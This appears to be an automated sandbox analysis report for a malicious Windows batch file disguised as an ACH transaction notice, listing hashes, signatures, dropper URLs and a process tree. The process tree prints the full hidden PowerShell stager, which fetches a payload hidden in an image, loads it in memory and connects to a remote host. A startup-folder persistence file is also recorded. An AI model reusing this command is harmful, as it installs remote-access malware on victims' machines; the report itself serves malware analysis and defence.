Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
30/10/2024, 02:27
Static task
static1
Behavioral task
behavioral1
Sample
CONCEPTO DE TRANSACCIÓN REALIZADA ACH.bat
Resource
win7-20241023-en
6 signatures
180 seconds
General
-
Target
CONCEPTO DE TRANSACCIÓN REALIZADA ACH.bat
-
Size
210KB
-
MD5
fc162f6d374e3bce9c3130fdcb6b7307
-
SHA1
a874953f738df2b9c59d52d1262aac387bf26fb7
-
SHA256
c7b24736650ed6130939821101f4641e1a50a2316f3bbcf974d85c8de585a40d
-
SHA512
520bf9202494786604d194bf6b23020231810744bbb405c1177ab7ee30c82633027445c3bb4e464cc690e7d7d0b6daaecd0a5884aeebcd585541d746cdf662e8
-
SSDEEP
6144:vZnip76K90FB+Z7VIuArKAgY2aaOOiuauK+yp8:E
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true
exe.dropper
https://github.com/CryptersAndTools/Upload/blob/main/new_image.jpg?raw=true
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2364 powershell.exe 6 2364 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2364 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\trombetada.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\trombetada.bat cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2364 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1048 wrote to memory of 2364 1048 cmd.exe 31 PID 1048 wrote to memory of 2364 1048 cmd.exe 31 PID 1048 wrote to memory of 2364 1048 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\CONCEPTO DE TRANSACCIÓN REALIZADA ACH.bat"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly9naXRodWIuY29tL0NyeXB0ZXJzQW5kVG9vbHMvVXBsb2FkL2Jsb2IvbWFpbi9uZXdfaW1hZ2UuanBnP3Jhdz10cnVl'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('joseamayaaa.chickenkiller.com', '1996');"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-